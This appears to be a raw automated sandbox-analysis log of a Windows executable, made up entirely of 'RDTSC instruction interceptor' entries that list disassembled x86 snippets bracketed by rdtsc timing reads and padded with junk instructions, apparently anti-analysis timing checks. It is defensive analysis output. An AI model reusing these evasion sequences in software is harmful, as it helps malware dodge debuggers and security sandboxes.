Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13AC792 second address: 13AC7A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FF6D0B95BECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13AC8F9 second address: 13AC918 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FF6D0B64821h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FF6D0B64816h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13B004F second address: 13B0059 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13B01DE second address: 13B01E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13B01E4 second address: 13B01EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13B01EA second address: 13B01EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13B045C second address: 13B047D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FF6D0B95BFBh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13B89DF second address: 13B89ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007FF6D0B64816h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13B89ED second address: 13B8A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007FF6D0B95BEEh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13B8A06 second address: 13B8A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13B800B second address: 13B8011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13B84A0 second address: 13B84A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13B84A6 second address: 13B84AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13B85E2 second address: 13B85E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13B85E7 second address: 13B85FB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF6D0B95BEAh 0x00000008 je 00007FF6D0B95C05h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13BBC9D second address: 13BBCB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FF6D0B64820h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13BB93C second address: 13BB95C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13BB95C second address: 13BB9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FF6D0B64822h 0x0000000a jc 00007FF6D0B6481Ah 0x00000010 push esi 0x00000011 pop esi 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF6D0B64827h 0x0000001c jmp 00007FF6D0B64821h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13C0860 second address: 13C0866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136BED7 second address: 136BEF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF6D0B64828h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136BEF6 second address: 136BF39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a xor cl, 0000001Ah 0x0000000d push 00000004h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007FF6D0B95BE8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 mov ecx, dword ptr [ebp+12471A3Dh] 0x0000002f sub ecx, dword ptr [ebp+122D2AB1h] 0x00000035 nop 0x00000036 push ecx 0x00000037 push eax 0x00000038 push edx 0x00000039 push ecx 0x0000003a pop ecx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136BF39 second address: 136BF3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13C0FE9 second address: 13C0FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF6D0B95BE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13C0FF3 second address: 13C0FFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FF6D0B64816h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13C32D3 second address: 13C32E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CBC1E second address: 13CBC32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF6D0B64816h 0x0000000a popad 0x0000000b push eax 0x0000000c jng 00007FF6D0B64816h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CBC32 second address: 13CBC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CBC37 second address: 13CBC46 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF6D0B6481Ah 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13C9C47 second address: 13C9C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF6D0B95BEEh 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13C9C62 second address: 13C9C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CA496 second address: 13CA4A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CA720 second address: 13CA728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CA9D9 second address: 13CA9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CA9DD second address: 13CA9E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CB59C second address: 13CB5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CB5A2 second address: 13CB5A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CB5A7 second address: 13CB5AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CB5AC second address: 13CB5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007FF6D0B64816h 0x0000000c popad 0x0000000d jmp 00007FF6D0B64827h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jg 00007FF6D0B64835h 0x0000001b jmp 00007FF6D0B64829h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CB5F4 second address: 13CB633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF6D0B95C10h 0x0000000a jmp 00007FF6D0B95BF1h 0x0000000f jmp 00007FF6D0B95BF9h 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 jnl 00007FF6D0B95BE6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CB940 second address: 13CB948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CB948 second address: 13CB97C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007FF6D0B95BEBh 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CB97C second address: 13CB98B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 js 00007FF6D0B64816h 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CF035 second address: 13CF03E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CF03E second address: 13CF044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CF044 second address: 13CF05E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CF05E second address: 13CF065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CF1BA second address: 13CF207 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FF6D0B95BF7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 jmp 00007FF6D0B95BECh 0x0000001a popad 0x0000001b pushad 0x0000001c jmp 00007FF6D0B95BF5h 0x00000021 push esi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CF359 second address: 13CF35F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CF4F7 second address: 13CF50F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF6D0B95BEBh 0x0000000a jns 00007FF6D0B95BE6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CF649 second address: 13CF65A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jp 00007FF6D0B64816h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CFA8E second address: 13CFA92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CFA92 second address: 13CFA9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CFC1A second address: 13CFC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13CFC1E second address: 13CFC28 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF6D0B64816h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13D4C1B second address: 13D4C29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FF6D0B95BEEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13D7036 second address: 13D703B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13DD56A second address: 13DD58C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FF6D0B95BF0h 0x00000008 pop edi 0x00000009 ja 00007FF6D0B95BF2h 0x0000000f jne 00007FF6D0B95BE6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13DD58C second address: 13DD5A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FF6D0B6481Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13DD5A4 second address: 13DD5AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13DD9AF second address: 13DD9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13DD9B5 second address: 13DD9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13DDB16 second address: 13DDB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FF6D0B6481Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13DDB27 second address: 13DDB2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13DDB2F second address: 13DDB33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13DDF2B second address: 13DDF43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6D0B95BF0h 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13DDF43 second address: 13DDF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13DDF49 second address: 13DDF51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13DDF51 second address: 13DDF56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13DDF56 second address: 13DDF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13DEADA second address: 13DEADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13DEADE second address: 13DEAE8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF6D0B95BE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13DEAE8 second address: 13DEB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FF6D0B6481Dh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13DEB07 second address: 13DEB22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13DEB22 second address: 13DEB2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jc 00007FF6D0B64816h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13DD109 second address: 13DD10D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13E5C99 second address: 13E5C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13E57D5 second address: 13E57EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6D0B95BF1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13E57EA second address: 13E5808 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF6D0B64822h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13E5808 second address: 13E580C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13E580C second address: 13E581B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnc 00007FF6D0B64816h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13F27D6 second address: 13F27E0 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF6D0B95BE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13F27E0 second address: 13F27EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13F27EB second address: 13F2807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF6D0B95BF2h 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13F2931 second address: 13F294A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnp 00007FF6D0B64816h 0x0000000c popad 0x0000000d jmp 00007FF6D0B6481Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13F6310 second address: 13F6314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13F6314 second address: 13F631A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13F645C second address: 13F6464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13F6464 second address: 13F6468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13F96A9 second address: 13F96CB instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF6D0B95BECh 0x00000008 je 00007FF6D0B95BE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push esi 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 pushad 0x00000018 jng 00007FF6D0B95BE6h 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13F96CB second address: 13F96E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007FF6D0B64823h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13FE424 second address: 13FE428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
